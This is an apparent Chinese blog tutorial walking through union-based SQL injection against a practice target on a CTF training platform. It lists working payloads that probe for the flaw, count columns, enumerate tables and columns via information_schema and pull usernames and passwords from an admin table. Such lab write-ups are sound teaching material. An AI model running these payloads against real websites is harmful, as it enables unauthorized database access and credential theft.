sql注入之union注入

server/2024/12/24 4:20:50/

Sql注入之union注入攻击

今天讲讲sql注入攻击流程

事先声明,本文仅仅作为学习使用,因个人原因导致的后果,皆与本人无关,后果由个人承担。

本次演示靶机为封神台里的题目,具体连接如下

https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7

那么话不多说,开始今天的讲解。今天主要讲sql注入中的union注入

对于一个网站,首先对于sql注入先验证是字符型注入还是数字型注入,

从以上两张图看出,我们将id=1改为id=1‘,页面出错,可以判断这个是数字型注入。对于字符型和数字型可以用这个方法判断

接下来使用id=1 and 1=1测试

以及使用id=1 and 1=2测试

这里发现1=1输出正常,而是用1=2页面报错,初步判断存漏洞

接下来使用order by

id=1 and 1=1 order by 1

id=1 and 1=1 order by 2

id=1 and 1=1 order by 3

可以看到order by 3 时网页出错,初步判断存在2个传参点

结合上面1=2存在漏洞,开始找漏洞

接下来使用union参数(从这里开始才是真正的union注入)

Id=1 and 1=2 union select1,2

网页输出2,所以我们对2处更改查找数据库

id=1 and 1=2 union select 1,database()

此处括号容易漏掉,本人操作时也经常漏掉,希望大家在以后的测试中不要忘记

接下来构造?id=1 and 1=2 union select 1, table_name from information_schema.tables where table_schema=database() limit 0,1

网页显示admin

接下来构造?id=1 and 1=2 union select 1, column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

这两句是union注入中较为重要的句子,大家在练习的时候建议敲一遍而不是复制粘贴,两句其实还挺像的,我把两句中的不同的地方标出来,方便大家记忆

将上述句子limit 0,1 更改为limit 1,1

再更改为limit 2,1

可知admin分为id,username,password

如果不确定的话可以改为limit 3,1试一下

接下来就是数据库信息了

使用如下句子:

?id=1 and 1=2 union select 1,username from admin  limit 0,1

将limit0,1改为1,1

查找密码

?id=1 and 1=2 union select 1,password from admin  limit 0,1

Limit0,1更改为1,1

到这里我们的sql注入的union注入就结束了,大家可以到官网上去看一下,也有解题思路,我这篇文章就是借鉴他的解题思路和过程。

最后声明,任何因个人原因导致的后果,皆有个人承担。


http://www.ppmy.cn/server/152665.html

相关文章

Mybatis加密解密查询操作(sql前),where要传入加密后的字段时遇到的问题

项目场景: 提示:这里简述项目相关背景: 例如:Mybatis加密解密查询操作(sql前),where要传入加密后的字段时遇到的问题 问题描述 提示:这里描述项目中遇到的问题: 例如…

React 工具和库面试题(一)

1. 如何在 React 项目中使用 Hooks 从服务端获取数据? 在 React 中,我们通常使用 useEffect Hook 来进行副作用操作,比如从服务端获取数据,结合 useState 来管理数据状态。 基本步骤: 使用 useEffect 来执行异步操作…

git 怎么删除一个远程分支

在Git中,删除远程分支是一个相对简单的操作。以下是删除远程分支的步骤: 打开命令行工具: 打开你的命令行工具(如Terminal、Git Bash、Cmder等)。 切换到你的仓库: 使用cd命令切换到你的Git仓库目录。 检…

基于Linux编写C语言基础命令

目录 一、常用的Linux命令 1、改变及显示目录命令:cd、pwd、ls。 1.1、cd(Change Directory) 1.2、pwd(Print Working Directory) 1.3、ls(List) 2、文件及目录的创建、复制、删除和移动命…

【蓝桥杯】43688-《Excel地址问题》

Excel地址问题 题目描述 Excel 单元格的地址表示很有趣,它可以使用字母来表示列号。比如, A 表示第 1 列, B 表示第 2 列, … Z 表示第 26 列, AA 表示第 27 列, AB 表示第 28 列, … BA 表示…

stm32制作CAN适配器5--WinUsb上位机编写

上次我们要stm32制作了一个基于winusb有canfd适配器,今天我们来制作一个上位机程序来进行报文收发。 上位机还是用以前写好的,只是更改下dll文件。 项目链接器,输入,附加依赖项中增加winusb.lib winusb初始化:#incl…

【CSS in Depth 2 精译_085】14.2:CSS 蒙版的用法

当前内容所在位置(可进入专栏查看其他译好的章节内容) 第四部分 视觉增强技术 ✔️【第 14 章 蒙版、形状与剪切】 ✔️ 14.1 滤镜 14.1.1 滤镜的类型14.1.2 背景滤镜 14.2 蒙版 ✔️ 14.2.1 带渐变效果的蒙版特效 ✔️14.2.2 基于亮度来定义蒙版 ✔️14…

【NVIDIA】启动ubuntu后显卡驱动丢失

前言 启动后分辨率变成800*600,而且不能改,nvidia-smi 显示 这种情况可以先不用着急重装; 执行 ls /usr/src | grep nvidia显示英伟达驱动版本 nvidia-565.57.01再 sudo dkms install -m nvidia -v 565.57.01就好了~&#xf…